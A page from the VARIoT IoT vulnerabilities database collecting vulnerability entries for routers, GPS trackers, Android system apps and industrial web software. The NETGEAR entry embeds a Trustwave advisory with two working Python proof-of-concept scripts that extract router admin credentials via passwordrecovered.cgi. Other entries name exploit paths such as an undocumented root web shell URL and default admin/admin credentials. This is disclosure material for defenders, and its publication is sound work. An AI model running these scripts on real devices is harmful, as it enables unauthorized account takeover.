VARIoT IoT vulnerabilities database

In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, an undocumented, root-privilege administration web shell is available using the HTTP path https://<device-ip-or-hostname>/adm/syscmd.asp. Cambium Networks cnPilot Vulnerabilities related to security functions exist in the firmware.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Cambium Networks cnPilot is a single-frequency router product of Cambium Networks in the United States that supports cloud management. Cambium Networks cnPilot using firmware version 4.3.2-R4 and earlier has security vulnerabilities

Due to a lack of authentication, an unauthenticated user who knows the Eview EV-07S GPS Tracker's phone number can revert the device to a factory default configuration with an SMS command, "RESET!". Eview EV-07S GPS There is an authentication vulnerability in the tracker firmware.Service operation interruption (DoS) An attack may be carried out. An attacker may exploit this issue to bypass certain security restrictions and perform unauthorized actions. Attackers can use SMS commands to exploit this vulnerability to restore factory settings

Due to a lack of bounds checking, several input configuration fields for the Eview EV-07S GPS Tracker will overflow data stored in one variable to another, overwriting the data of another field. Eview EV-07S GPS There is a buffer error vulnerability in the tracker firmware.Information may be tampered with. A buffer-overflow vulnerability 2. An information-disclosure vulnerability Successful exploits can allow attackers to obtain sensitive information or to execute arbitrary code in the context of the affected application. Failed attempts may lead to a denial-of-service condition

Due to a lack of standard encryption when transmitting sensitive information over the internet to a centralized monitoring service, the Eview EV-07S GPS Tracker discloses personally identifying information, such as GPS data and IMEI numbers, to any man-in-the-middle (MitM) listener. Eview EV-07S GPS The tracker firmware contains a vulnerability related to cryptographic strength.Information may be obtained. A buffer-overflow vulnerability 2. An information-disclosure vulnerability Successful exploits can allow attackers to obtain sensitive information or to execute arbitrary code in the context of the affected application. Failed attempts may lead to a denial-of-service condition

An issue was discovered in certain Apple products. iOS before 10.2 is affected. The issue involves the "Clipboard" component, which allows physically proximate attackers to obtain sensitive information in the lockscreen state by viewing clipboard contents. Apple iOS is prone to an information-disclosure vulnerability. An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. Clipboard is one of the system clipboard tools. A local attacker could exploit this vulnerability to access the clipboard contents

An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions. NETGEARR8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900 and R8000 are Netgear's wireless router products. There are information disclosure vulnerabilities in several NETGEAR products. Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks. Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers Published: 01/30/2017 Version: 1.0 Vendor: NETGEAR (http://www.netgear.com/) Product: Multiple products Finding 1: Remote and Local Password Disclosure Credit: Simon Kenin of Trustwave SpiderLabs CVE: CVE-2017-5521 Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest) # AC1450 V1.0.0.22_1.0.10 # AC1450 V1.0.0.14_1.0.6 # D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected) # D6400 V1.0.0.34_1.3.34 # D6400 V1.0.0.38_1.1.38 # D6400 V1.0.0.22_1.0.22 # DC112A V1.0.0.30_1.0.60 (Latest) # DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected) # JNDR3000 V1.0.0.18_1.0.16 (Latest) # R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected) # R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected) # R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected) # R6300 V1.0.2.78_1.0.58 (Latest) # R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched) # R6300v2 V1.0.3.30_10.0.73 # R6700 V1.0.1.14_10.0.29 (Latest beta) # R6700 V1.0.0.26_10.0.26 (Latest stable) # R6700 V1.0.0.24_10.0.18 # R6900 V1.0.0.4_1.0.10 (Latest) # R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched) # R8300 V1.0.2.48_1.0.52 # R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched) # R8500 V1.0.2.26_1.0.41 # R8500 V1.0.0.56_1.0.28 # R8500 V1.0.0.20_1.0.11 # VEGN2610 V1.0.0.35_1.0.35 (Latest) # VEGN2610 V1.0.0.29_1.0.29 # VEGN2610 V1.0.0.27_1.0.27 # WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected) # WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected) # WNDR3700v3 V1.0.0.38_1.0.31 (Latest) # WNDR4000 V1.0.2.4_9.1.86 (Latest) # WNDR4500 V1.0.1.40_1.0.68 (Latest) # WNDR4500v2 V1.0.0.60_1.0.38 (Latest) # WNDR4500v2 V1.0.0.42_1.0.25 # WGR614v10 V1.0.2.60_60.0.85NA (Latest) # WGR614v10 V1.0.2.58_60.0.84NA # WGR614v10 V1.0.2.54_60.0.82NA # WN3100RP V1.0.0.14_1.0.19 (Latest) # WN3100RP V1.0.0.6_1.0.12 # Lenovo R3220 V1.0.0.16_1.0.16 (Latest) # Lenovo R3220 V1.0.0.13_1.0.13 Product description: Multiple Netgear Routers Many Netgear routers are prone to password disclosure via simple crafted requests to the web management server. This can easily be reproduced using the attached poc, or by sending these two simple requests via the browser: 1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token 2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get) ## netgore.py import sys import requests def scrape(text, start_trig, end_trig): if text.find(start_trig) != -1: return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] else: return "i_dont_speak_english" #disable nasty insecure ssl warning requests.packages.urllib3.disable_warnings() #1st stage - get token ip = sys.argv[1] port = sys.argv[2] url = 'http://' + ip + ':' + port + '/' try: r = requests.get(url) except: url = 'https://' + ip + ':' + port + '/' r = requests.get(url, verify=False) model = r.headers.get('WWW-Authenticate') if model is not None: print "Attcking: " + model[13:-1] else: print "not a netgear router" sys.exit(0) token = scrape(r.text, 'unauth.cgi?id=', '\"') if token == 'i_dont_speak_english': print "not vulnerable" sys.exit(0) print "token found: " + token #2nd stage - pass the token - get the password url = url + 'passwordrecovered.cgi?id=' + token r = requests.post(url, verify=False) #profit if r.text.find('left\">') != -1: username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>'))) username = scrape(username, '>', '\'') password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>'))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>')) else: print "not vulnerable becuse password recovery IS set" sys.exit(0) #html encoding pops out of nowhere, lets replace that password = password.replace("&#35;","#") password = password.replace("&","&") print "user: " + username print "pass: " + password ================================ Just run the PoC against a router to get the credentials if it is vulnerable. Finding 2: Remote and Local Password Disclosure Credit: Simon Kenin of Trustwave SpiderLabs CVE: CVE-2017-5521 Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest) # AC1450 V1.0.0.22_1.0.10 # AC1450 V1.0.0.14_1.0.6 # D6300 V1.0.0.96_1.1.96 (Latest) # D6300B V1.0.0.36_1.0.36 # D6300B V1.0.0.32_1.0.32 # D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched) # D6400 V1.0.0.22_1.0.22 # DC112A V1.0.0.30_1.0.60 (Latest) # DGN2200v4 V1.0.0.76_1.0.76 (Latest) # DGN2200v4 V1.0.0.66_1.0.66 # DGN2200Bv4 V1.0.0.68_1.0.68 (Latest) # JNDR3000 V1.0.0.18_1.0.16 (Latest) # R6200 V1.0.1.56_1.0.43 (Latest) # R6200 V1.0.1.52_1.0.41 # R6200 V1.0.1.48_1.0.37 # R6200v2 V1.0.3.10_10.1.10 (Latest) # R6200v2 V1.0.1.20_1.0.18 # R6250 V1.0.4.6_10.1.12 (Latest beta) # R6250 V1.0.4.2_10.1.10 (Latest stable) # R6250 V1.0.1.84_1.0.78 # R6300 V1.0.2.78_1.0.58 (Latest) # R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched) # R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.) # R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched) # R6700 V1.0.0.26_10.0.26 (Latest) # R6700 V1.0.0.24_10.0.18 # R6900 V1.0.0.4_1.0.10 (Latest) # R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched) # R7000 V1.0.4.30_1.1.67 # R7900 V1.0.1.8_10.0.14 (Latest beta) # R7900 V1.0.1.4_10.0.12 (Latest stable) # R7900 V1.0.0.10_10.0.7 # R7900 V1.0.0.8_10.0.5 # R7900 V1.0.0.6_10.0.4 # R8000 V1.0.3.26_1.1.18 (Latest beta) # R8000 V1.0.3.4_1.1.2 (Latest stable) # R8300 V1.0.2.48_1.0.52 # R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched) # R8500 V1.0.2.30_1.0.43 # VEGN2610 V1.0.0.35_1.0.35 (Latest) # VEGN2610 V1.0.0.27_1.0.27 # VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest) # VEVG2660 V1.0.0.23_1.0.23 # WNDR3400v2 V1.0.0.52_1.0.81 (Latest) # WNDR3400v3 V1.0.1.4_1.0.52 (Latest) # WNDR3400v3 V1.0.1.2_1.0.51 # WNDR3400v3 V1.0.0.22_1.0.29 # WNDR3700v3 V1.0.0.38_1.0.31 (Latest) # WNDR4000 V1.0.2.4_9.1.86 (Latest) # WNDR4500 V1.0.1.40_1.0.68 (Latest) # WNDR4500 V1.0.1.6_1.0.24 # WNDR4500v2 V1.0.0.60_1.0.38 (Latest) # WNDR4500v2 V1.0.0.50_1.0.30 # WNR1000v3 V1.0.2.68_60.0.93NA (Latest) # WNR1000v3 V1.0.2.62_60.0.87 (Latest) # WNR3500Lv2 V1.2.0.34_40.0.75 (Latest) # WNR3500Lv2 V1.2.0.32_40.0.74 # WGR614v10 V1.0.2.60_60.0.85NA (Latest) # WGR614v10 V1.0.2.58_60.0.84NA # WGR614v10 V1.0.2.54_60.0.82NA # Lenovo R3220 V1.0.0.16_1.0.16 (Latest) # Lenovo R3220 V1.0.0.13_1.0.13 Many Netgear routers are prone to password disclosure via simple crafted request to the web management server. This mechanism does not work correctly on the very first request to "passwordrecovered.cgi" and the token is not properly checked, this means that any TOKEN value will result in disclosure of the password. The issue occurs after every reboot of the router. This can easily be reproduced using the attached poc, or by sending a simple request via the browser: 1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get) ## netgore2.py import sys import requests def scrape(text, start_trig, end_trig): if text.find(start_trig) != -1: return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] else: return "i_dont_speak_english" #disable nasty insecure ssl warning requests.packages.urllib3.disable_warnings() #1st stage ip = sys.argv[1] port = sys.argv[2] url = 'http://' + ip + ':' + port + '/' try: r = requests.get(url) except: url = 'https://' + ip + ':' + port + '/' r = requests.get(url, verify=False) model = r.headers.get('WWW-Authenticate') if model is not None: print "Attcking: " + model[13:-1] else: print "not a netgear router" sys.exit(0) #2nd stage url = url + 'passwordrecovered.cgi?id=get_rekt' try: r = requests.post(url, verify=False) except: print "not vulnerable router" sys.exit(0) #profit if r.text.find('left\">') != -1: username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>'))) username = scrape(username, '>', '\'') password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>'))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>')) else: print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again" sys.exit(0) #html encoding pops out of nowhere, lets replace that password = password.replace("&#35;","#") password = password.replace("&","&") print "user: " + username print "pass: " + password ================================ Just run the PoC against a router to get the credentials if it is vulnerable. Remediation Steps: Please see NETGEAR's KBA for list of firmware patches for various models. Revision History: 04/06/2016 - Vulnerability disclosed to vendor 04/19/2016 - Request for update and received confirmation of receipt of the advisories 05/18/2016 - Request for update; no response 07/14/2016 - Request for update 07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage 10/17/2016 - Request for update 12/15/2016 - Notice of intent to publish advisories 01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd 01/30/2017 - Advisory published References 1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html 2. https://www.exploit-db.com/exploits/32883/ 3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply

An issue was discovered on BLU R1 HD devices with Shanghai Adups software. The two package names involved in the exfiltration are com.adups.fota and com.adups.fota.sysoper. In the com.adups.fota.sysoper app's AndroidManifest.xml file, it sets the android:sharedUserId attribute to a value of android.uid.system which makes it execute as the system user, which is a very privileged user on the device. Therefore, the app executing as the system user has been granted a number of powerful permissions even though they are not present in the com.adups.fota.sysoper app's AndroidManifest.xml file. This app provides the com.adups.fota app access to the user's call log, text messages, and various device identifiers through the com.adups.fota.sysoper.provider.InfoProvider component. The com.adups.fota app uses timestamps when it runs and is eligible to exfiltrate the user's PII every 72 hours. If 72 hours have passed since the value of the timestamp, then the exfiltration will be triggered by the user plugging in the device to charge or when they leave or enter a wireless network. The exfiltration occurs in the background without any user interaction. Adups Fota is a professional wireless upgrade solution for Shanghai IoT Technology Co., Ltd. (Adups) for IoT devices (smart cars, wearables, homes, VR, etc.). Adups has multiple local privilege escalation vulnerabilities. An attacker could use this vulnerability to elevate privileges. Local attackers can exploit these issues to gain elevated privileges

An issue was discovered on LG devices using the MTK chipset with L(5.0/5.1), M(6.0/6.0.1), and N(7.0) software, and RCA Voyager Tablet, BLU Advance 5.0, and BLU R1 HD devices. The MTKLogger app with a package name of com.mediatek.mtklogger has application components that are accessible to any application that resides on the device. Namely, the com.mediatek.mtklogger.framework.LogReceiver and com.mediatek.mtklogger.framework.MTKLoggerService application components are exported since they contain an intent filter, are not protected by a custom permission, and do not explicitly set the android:exported attribute to false. Therefore, these components are exported by default and are thus accessible to any third party application by using android.content.Intent object for communication. These application components can be used to start and stop the logs using Intent objects with embedded data. The available logs are the GPS log, modem log, network log, and mobile log. The base directory that contains the directories for the 4 types of logs is /sdcard/mtklog which makes them accessible to apps that require the READ_EXTERNAL_STORAGE permission. The GPS log contains the GPS coordinates of the user as well as a timestamp for the coordinates. The modem log contains AT commands and their parameters which allow the user's outgoing and incoming calls and text messages to be obtained. The network log is a tcpdump network capture. The mobile log contains the Android log, which is not available to third-party apps as of Android 4.1. The LG ID is LVE-SMP-160019. MTK Use chipset LG The device contains a vulnerability that allows access to arbitrary third-party applications. Lgmobile is an Android smartphone owned by LG. There are multiple security bypass vulnerabilities in several LGAndroid MobileDevices. An attacker could exploit the vulnerability to bypass certain security restrictions and perform unauthorized operations

An issue was discovered on BLU Advance 5.0 and BLU R1 HD devices with Shanghai Adups software. The com.adups.fota.sysoper app is installed as a system app and cannot be disabled by the user. In the com.adups.fota.sysoper app's AndroidManifest.xml file, it sets the android:sharedUserId attribute to a value of android.uid.system which makes it execute as the system user, which is a very privileged user on the device. The app has an exported broadcast receiver named com.adups.fota.sysoper.WriteCommandReceiver which any app on the device can interact with. Therefore, any app can send a command embedded in an intent which will be executed by the WriteCommandReceiver component which is executing as the system user. The third-party app, utilizing the WriteCommandReceiver, can perform the following actions: call a phone number, factory reset the device, take pictures of the screen, record the screen in a video, install applications, inject events, obtain the Android log, and others. In addition, the com.adups.fota.sysoper.TaskService component will make a request to a URL of http://rebootv5.adsunflower.com/ps/fetch.do where the commands in the String array with a key of sf in the JSON Object sent back by the server will be executed as the system user. Since the connection is made via HTTP, it is vulnerable to a MITM attack. BLU Advance 5.0 and BLU R1 HD Run on device Adups FOTA of com.adups.fota.sysoper The man in the middle attack (MITM attack) As a result, there are vulnerabilities that are unspecified affected.With third-party applications, HTTP Man-in-the-middle attacks over the connection (MITM attack) And may be affected unspecified as a result. Adups Fota is a professional wireless upgrade solution provided by Shanghai Guangsheng Information Technology Co., Ltd. (Adups) for IoT devices (smart cars, wearables, homes, VR, etc.). Adups has an information disclosure vulnerability. A remote attacker could use the vulnerability to execute arbitrary instructions. Adups Fota is prone to an information-disclosure vulnerability. Remote attackers can exploit this issue to gain access to sensitive information. This may aid in further attacks

An issue was discovered on BLU R1 HD devices with Shanghai Adups software. The content provider named com.adups.fota.sysoper.provider.InfoProvider in the app with a package name of com.adups.fota.sysoper allows any app on the device to read, write, and delete files as the system user. In the com.adups.fota.sysoper app's AndroidManifest.xml file, it sets the android:sharedUserId attribute to a value of android.uid.system which makes it execute as the system user, which is a very privileged user on the device. This allows a third-party app to read, write, and delete the user's sent and received text messages and call log. This allows a third-party app to obtain PII from the user without permission to do so. Adups Fota is a professional wireless upgrade solution provided by Shanghai Guangsheng Information Technology Co., Ltd. (Adups) for IoT devices (smart cars, wearables, homes, VR, etc.). Adups has a local privilege elevation vulnerability. Attackers can use vulnerabilities to obtain privilege information and elevate permissions. Local attackers can exploit this issue to gain elevated privileges

An issue was discovered on BLU R1 HD devices with Shanghai Adups software. The content provider named com.adups.fota.sysoper.provider.InfoProvider in the app with a package name of com.adups.fota.sysoper allows any app on the device to read, write, and delete files as the system user. In the com.adups.fota.sysoper app's AndroidManifest.xml file, it sets the android:sharedUserId attribute to a value of android.uid.system which makes it execute as the system user, which is a very privileged user on the device. This allows a third-party app to read, write, and delete files owned by the system user. The third-party app can modify the /data/system/users/0/settings_secure.xml file to add an app as a notification listener to be able to receive the text of notifications as they are received on the device. This also allows the /data/system/users/0/accounts.db to be read which contains authentication tokens for various accounts on the device. The third-party app can obtain privileged information and also modify files to obtain more privileges on the device. Adups Fota is a professional wireless upgrade solution provided by Shanghai Guangsheng Information Technology Co., Ltd. (Adups) for IoT devices (smart cars, wearables, homes, VR, etc.). Adups has a local information disclosure vulnerability. Adups is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information and perform unauthorized actions. Failed attacks will cause denial-of-service conditions

An issue was discovered in Advantech WebAccess Version 8.1. To be able to exploit the SQL injection vulnerability, an attacker must supply malformed input to the WebAccess software. Successful attack could result in administrative access to the application and its data files. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability, but can be easily bypassed.The specific flaw exists within updateTemplate.aspx. The vulnerability is caused by lack of input validation before using a remotely supplied string to construct SQL queries. An attacker can use this vulnerability to disclose passwords of administrative accounts used by Advantech WebAccess. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A SQL injection vulnerability exists in Advantech WebAccess version 8.1. Advantech WebAccess is prone to an SQL-injection vulnerability and an authentication-bypass vulnerability. An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions, modify the logic of SQL queries, compromise the software, retrieve information, or modify data; other consequences are possible as well. WebAccess 8.1 is vulnerable; other versions may also be affected

An issue was discovered in Advantech WebAccess Version 8.1. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access pages unrestricted (AUTHENTICATION BYPASS). This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability, but can be easily bypassed.The specific flaw exists within updateTemplate.aspx. The vulnerability is caused by lack of input validation before using a remotely supplied string to construct SQL queries. An attacker can use this vulnerability to disclose passwords of administrative accounts used by Advantech WebAccess. Advantech WebAccess (formerly known as BroadWinWebAccess) is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A security bypass vulnerability exists in Advantech WebAccess version 8.1. An attacker could exploit the vulnerability to bypass certain security restrictions and perform unauthorized operations. Advantech WebAccess is prone to an SQL-injection vulnerability and an authentication-bypass vulnerability. WebAccess 8.1 is vulnerable; other versions may also be affected

An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. The access control flaw allows access to most application functions without authentication. CarloGavazziAutomationVMU-CEM and VMU-CPV are control modules in the automation products of Italy's CarloGavazzi Automation. There are unauthorized access vulnerabilities in CarloGavazziAutomationVMU-CEM and VMU-CPV. An unauthenticated attacker exploits a vulnerability to access a device and obtain sensitive information to perform unauthorized operations. Multiple Carlo Gavazzi products are prone to an unauthorized-access vulnerability, a cross-site request-forgery vulnerability and an information-disclosure vulnerability. Other attacks are also possible. An attacker could exploit this vulnerability to change configuration parameters. *VMU-C Web-Server solution for photovoltaic applications* VMU-C EM is a data logger system for small to medium projects, VMUC-Y EM is a hardware data aggregator for medium to larger projects and Em2 Server is a software solution for large projects. They are designed to complement the extensive line of Carlo Gavazzi energy meters and current transformers. Weak Credentials Management* -> admin/admin -> Application does not enforce mandatory password change *2. Sensitive Information stored in clear-text* Accounts menu option a shows username and password a passwords shown in clear-text a SMTP server password a user and service passwords are stored in clear-text *3. Application stores the Energy / Plant data in a sqlite database - EWPlant.db. Anyone can dump plant database file - without any authentication *4. Reflected + Stored XSS - multiple URLs, parameters - *Not documented in ICS-CERT Advisory Successful exploitation of this vulnerability could allow an unauthenticated attacker to inject arbitrary JavaScript in a specially crafted URL request where the response containing user data is returned to the web browser without being made safe to display. *5. Vulnerable to Cross-Site Request Forgery* There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. +++++

An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. Successful exploitation of this CROSS-SITE REQUEST FORGERY (CSRF) vulnerability can allow execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. CarloGavazziAutomationVMU-CEM and VMU-CPV are control modules in the automation products of Italy's CarloGavazzi Automation. There is a cross-site request forgery vulnerability in CarloGavazziAutomationVMU-CEM and VMU-CPV. A remote attacker exploits a vulnerability to trick a user into parsing by constructing a malicious URL to perform malicious actions in the context of the target user. Exploiting these issues may allow a remote attacker to gain access to the sensitive information, or perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible. An attacker could exploit the vulnerability to perform unauthorized operations. *VMU-C Web-Server solution for photovoltaic applications* VMU-C EM is a data logger system for small to medium projects, VMUC-Y EM is a hardware data aggregator for medium to larger projects and Em2 Server is a software solution for large projects. They are designed to complement the extensive line of Carlo Gavazzi energy meters and current transformers. Weak Credentials Management* -> admin/admin -> Application does not enforce mandatory password change *2. Sensitive Information stored in clear-text* Accounts menu option a shows username and password a passwords shown in clear-text a SMTP server password a user and service passwords are stored in clear-text *3. Access Control flaws* 1. Access control is not enforced correctly 2. Certain application functions can be accessed without any authentication 3. Application stores the Energy / Plant data in a sqlite database - EWPlant.db. Anyone can dump plant database file - without any authentication *4. Reflected + Stored XSS - multiple URLs, parameters - *Not documented in ICS-CERT Advisory Successful exploitation of this vulnerability could allow an unauthenticated attacker to inject arbitrary JavaScript in a specially crafted URL request where the response containing user data is returned to the web browser without being made safe to display. *5. +++++

An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. Sensitive information is stored in clear-text. Carlo Gavazzi VMU-C EM and VMU-C PV Firmware contains a vulnerability that allows important information to be stored in clear text.Important information may be stored in clear text. CarloGavazziAutomationVMU-CEM and VMU-CPV are control modules in the automation products of Italy's CarloGavazzi Automation. Multiple Carlo Gavazzi products are prone to an unauthorized-access vulnerability, a cross-site request-forgery vulnerability and an information-disclosure vulnerability. Exploiting these issues may allow a remote attacker to gain access to the sensitive information, or perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible. *VMU-C Web-Server solution for photovoltaic applications* VMU-C EM is a data logger system for small to medium projects, VMUC-Y EM is a hardware data aggregator for medium to larger projects and Em2 Server is a software solution for large projects. They are designed to complement the extensive line of Carlo Gavazzi energy meters and current transformers. Weak Credentials Management* -> admin/admin -> Application does not enforce mandatory password change *2. Access Control flaws* 1. Access control is not enforced correctly 2. Certain application functions can be accessed without any authentication 3. Application stores the Energy / Plant data in a sqlite database - EWPlant.db. Anyone can dump plant database file - without any authentication *4. Reflected + Stored XSS - multiple URLs, parameters - *Not documented in ICS-CERT Advisory Successful exploitation of this vulnerability could allow an unauthenticated attacker to inject arbitrary JavaScript in a specially crafted URL request where the response containing user data is returned to the web browser without being made safe to display. *5. Vulnerable to Cross-Site Request Forgery* There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. +++++

An issue was discovered in VideoInsight Web Client Version 6.3.5.11 and previous versions. A SQL Injection vulnerability has been identified, which may allow remote code execution. VideoInsightWebClient is a web-based client of VideoInsight, USA. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database

Samsung Note devices with L(5.0/5.1), M(6.0), and N(7.0) software allow attackers to crash systemUI by leveraging incomplete exception handling. The Samsung ID is SVE-2016-7122. SamsungNote is a smartphone released by Samsung in South Korea. The SamsungNote device failed to handle exceptions correctly, allowing remote attackers to exploit the vulnerability to build malicious applications, trigger systemUI crashes, and denial of service. Multiple Samsung Android Mobile devices are prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the system, resulting in denial-of-service conditions

Samsung Note devices with KK(4.4), L(5.0/5.1), and M(6.0) software allow attackers to crash the system by creating an arbitrarily large number of active VR service threads. The Samsung ID is SVE-2016-7650. Samsung Note There is a vulnerability in the device software that can cause a system crash. SamsungNote is a smartphone released by South Korea's Samsung. Multiple Samsung Android Mobile devices are prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the system, resulting in denial-of-service conditions

On Juniper Networks products or platforms running Junos OS 12.1X46 prior to 12.1X46-D50, 12.1X47 prior to 12.1X47-D40, 12.3 prior to 12.3R13, 12.3X48 prior to 12.3X48-D30, 13.2X51 prior to 13.2X51-D40, 13.3 prior to 13.3R10, 14.1 prior to 14.1R8, 14.1X53 prior to 14.1X53-D35, 14.1X55 prior to 14.1X55-D35, 14.2 prior to 14.2R5, 15.1 prior to 15.1F6 or 15.1R3, 15.1X49 prior to 15.1X49-D30 or 15.1X49-D40, 15.1X53 prior to 15.1X53-D35, and where RIP is enabled, certain RIP advertisements received by the router may cause the RPD daemon to crash resulting in a denial of service condition. Juniper Networks Run on products and platforms Junos OS Contains a data processing vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Juniper Junos is prone to a denial-of-service vulnerability. Attackers can exploit this issue to crash and restart the affected device, denying service to legitimate users. Juniper Junos OS is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware systems. The operating system provides a secure programming interface and Junos SDK